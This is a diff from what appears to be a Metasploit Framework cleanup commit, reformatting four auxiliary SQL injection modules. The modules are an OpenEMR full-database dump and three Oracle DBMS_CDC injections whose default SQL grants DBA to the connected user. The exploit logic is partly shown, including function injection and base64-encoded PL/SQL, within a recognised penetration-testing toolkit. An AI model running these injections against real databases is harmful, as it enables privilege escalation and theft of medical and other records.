rapid7 · bcoles · May 10, 2025
diff --git a/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb b/modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
@@ -10,29 +10,36 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::SQLi
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name' => 'OpenEMR 5.0.1 Patch 6 SQLi Dump',
-      'Description' => '
-        This module exploits a SQLi vulnerability found in
-        OpenEMR version 5.0.1 Patch 6 and lower. The
-        vulnerability allows the contents of the entire
-        database (with exception of log and task tables) to be
-        extracted.
-        This module saves each table as a `.csv` file in your
-        loot directory and has been tested with
-        OpenEMR 5.0.1 (3).
-      ',
-      'License' => MSF_LICENSE,
-      'Author' =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'OpenEMR 5.0.1 Patch 6 SQLi Dump',
+        'Description' => %q{
+          This module exploits a SQLi vulnerability found in
+          OpenEMR version 5.0.1 Patch 6 and lower. The
+          vulnerability allows the contents of the entire
+          database (with exception of log and task tables) to be
+          extracted.
+          This module saves each table as a `.csv` file in your
+          loot directory and has been tested with
+          OpenEMR 5.0.1 (3).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Will Porter <will.porter[at]lodestonesecurity.com>'
         ],
-      'References' => [
-        ['CVE', '2018-17179'],
-        ['URL', 'https://github.com/openemr/openemr/commit/3e22d11c7175c1ebbf3d862545ce6fee18f70617']
-      ],
-      'DisclosureDate' => '2019-05-17'
-    ))
+        'References' => [
+          ['CVE', '2018-17179'],
+          ['URL', 'https://github.com/openemr/openemr/commit/3e22d11c7175c1ebbf3d862545ce6fee18f70617']
+        ],
+        'DisclosureDate' => '2019-05-17',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -93,7 +100,7 @@ def save_csv(data, table)
     # Use the same gsub pattern as store_loot
     # this will put the first 8 safe characters of the tablename
     # in the filename in the loot directory
-    safe_table = table.gsub(/[^a-z0-9\.\_]+/i, '')
+    safe_table = table.gsub(/[^a-z0-9._]+/i, '')
     store_loot(
       "openemr.#{safe_table}.dump",
       'application/CSV',

diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb
@@ -7,35 +7,43 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::ORACLE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Oracle DB SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE',
+        'Description' => %q{
           The module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE
           procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege
           on the vulnerable package can exploit this vulnerability. By default, users granted
           EXECUTE_CATALOG_ROLE have the required privilege.  Affected versions: Oracle Database
           Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU.
-      },
-      'Author'         => [ 'MC' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        },
+        'Author' => [ 'MC' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2008-3996' ],
           [ 'OSVDB', '49321']
         ],
-      'DisclosureDate' => '2008-10-22'))
+        'DisclosureDate' => '2008-10-22',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
 
-      register_options(
-        [
-          OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]),
-        ])
+    register_options(
+      [
+        OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]),
+      ]
+    )
   end
 
-
   def run
-    return if not check_dependencies
+    return if !check_dependencies
 
-    name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+    name = Rex::Text.rand_text_alpha_upper(1..10)
 
     function = "
       CREATE OR REPLACE FUNCTION #{name}
@@ -55,13 +63,13 @@ def run
     clean = "DROP FUNCTION #{name}"
 
     begin
-      print_status("Sending function...")
+      print_status('Sending function...')
       prepare_exec(function)
-    rescue => e
+    rescue StandardError
       return
     end
 
-    print_status("Attempting sql injection on SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE...")
+    print_status('Attempting sql injection on SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE...')
     prepare_exec(package)
 
     print_status("Done! Removing function '#{name}'...")

diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb
@@ -7,35 +7,44 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::ORACLE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE',
-      'Description'    => %q{
-        The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE
-        procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege
-        on the vulnerable package can exploit this vulnerability. By default, users granted
-        EXECUTE_CATALOG_ROLE have the required privilege.
-        Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1.
-        Fixed with October 2008 CPU.
-      },
-      'Author'         => [ 'MC' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE',
+        'Description' => %q{
+          The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE
+          procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege
+          on the vulnerable package can exploit this vulnerability. By default, users granted
+          EXECUTE_CATALOG_ROLE have the required privilege.
+          Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1.
+          Fixed with October 2008 CPU.
+        },
+        'Author' => [ 'MC' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2008-3995' ],
           [ 'OSVDB', '49320']
         ],
-      'DisclosureDate' => '2008-10-22'))
+        'DisclosureDate' => '2008-10-22',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
 
-      register_options(
-        [
-          OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]),
-        ])
+    register_options(
+      [
+        OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]),
+      ]
+    )
   end
 
   def run
-    return if not check_dependencies
+    return if !check_dependencies
 
-    name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+    name = Rex::Text.rand_text_alpha_upper(1..10)
 
     function = "
       CREATE OR REPLACE FUNCTION #{name}
@@ -57,12 +66,12 @@ def run
     clean = "DROP FUNCTION #{name}"
 
     begin
-      print_status("Sending function...")
+      print_status('Sending function...')
       prepare_exec(function)
-    rescue => e
+    rescue StandardError
       return
     end
-    print_status("Attempting sql injection on SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE...")
+    print_status('Attempting sql injection on SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE...')
     prepare_exec(package)
 
     print_status("Done! Removing function '#{name}'...")

diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb
@@ -7,36 +7,45 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::ORACLE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE',
-      'Description'    => %q{
-        The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE
-        procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege
-        on the vulnerable package can exploit this vulnerability. By default, users granted
-        EXECUTE_CATALOG_ROLE have the required privilege.
-      },
-      'Author'         => [ 'MC' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE',
+        'Description' => %q{
+          The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE
+          procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege
+          on the vulnerable package can exploit this vulnerability. By default, users granted
+          EXECUTE_CATALOG_ROLE have the required privilege.
+        },
+        'Author' => [ 'MC' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2010-0870' ],
           [ 'OSVDB', '63772'],
           [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html' ]
         ],
-      'DisclosureDate' => '2010-04-26'))
+        'DisclosureDate' => '2010-04-26',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
 
-      register_options(
-        [
-          OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]),
-        ])
+    register_options(
+      [
+        OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]),
+      ]
+    )
   end
 
   def run
-    return if not check_dependencies
+    return if !check_dependencies
 
-    name  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
-    var1  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
-    var2  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+    name = Rex::Text.rand_text_alpha_upper(1..10)
+    var1 = Rex::Text.rand_text_alpha_upper(1..10)
+    var2 = Rex::Text.rand_text_alpha_upper(1..10)
 
     function = "
 CREATE OR REPLACE FUNCTION #{name}
@@ -56,10 +65,10 @@ def run
 END;
     "
 
-    uno  = Rex::Text.encode_base64(function)
-    dos  = Rex::Text.encode_base64(package)
+    uno = Rex::Text.encode_base64(function)
+    dos = Rex::Text.encode_base64(package)
 
-    encoded_sql = %Q|
+    encoded_sql = %|
 DECLARE
 #{var1} VARCHAR2(32767);
 #{var2} VARCHAR2(32767);
@@ -71,9 +80,8 @@ def run
 END;
     |
 
-    print_status("Attempting sql injection on SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE...")
+    print_status('Attempting sql injection on SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE...')
     prepare_exec(encoded_sql)
-    print_status("Done...")
-
+    print_status('Done...')
   end
 end